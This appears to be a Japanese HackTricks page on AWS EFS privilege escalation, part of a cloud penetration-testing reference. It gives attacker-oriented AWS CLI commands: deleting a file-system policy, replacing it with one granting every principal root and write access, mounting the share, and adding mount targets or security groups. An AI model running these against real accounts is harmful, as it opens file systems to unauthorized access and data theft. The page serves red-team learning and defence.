AWS - EFS Privesc

Reading time: 5 minutes

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

EFS

EFSに関する詳細情報は以下にあります:

AWS - EFS Enum

EFSをマウントするには、EFSが公開されているサブネット内にいる必要があり、アクセス権(セキュリティグループ)が必要です。これが発生している場合、デフォルトでは常にマウントできるはずですが、IAMポリシーによって保護されている場合は、アクセスするためにここで言及されている追加の権限が必要です。

elasticfilesystem:DeleteFileSystemPolicy|elasticfilesystem:PutFileSystemPolicy

これらの権限のいずれかを持つ攻撃者は、ファイルシステムポリシーを変更してアクセスを与えることができるか、単に削除してデフォルトのアクセスを付与することができます。

ポリシーを削除するには:

bash
aws efs delete-file-system-policy \
--file-system-id <value>

変更するには:

json
aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}

elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)

この権限を持つ攻撃者はEFSをマウントすることができます。もし書き込み権限がデフォルトでEFSをマウントできるすべての人に与えられていない場合、彼は読み取りアクセスのみを持つことになります。

bash
sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

elasticfilesystem:ClientRootAccesselasticfilesystem:ClientWrite の追加権限は、マウントされた後にファイルシステム内に 書き込む ためと、そのファイルシステムに ルート として アクセス するために使用できます。

潜在的な影響: ファイルシステム内の機密情報を見つけることによる間接的な特権昇格。

elasticfilesystem:CreateMountTarget

攻撃者が マウントターゲット が存在しない サブネット 内にいる場合、彼はこの権限を使って 自分のサブネット にマウントターゲットを 作成 することができます。

bash
# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>

潜在的な影響: ファイルシステム内の機密情報を特定することによる間接的な権限昇格。

elasticfilesystem:ModifyMountTargetSecurityGroups

攻撃者がEFSのマウントターゲットが自分のサブネット内にあることを発見し、トラフィックを許可するセキュリティグループがない場合、彼は単に選択したセキュリティグループを変更することでそれを修正できる:

bash
aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>

潜在的な影響: ファイルシステム内の機密情報を特定することによる間接的な権限昇格。

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする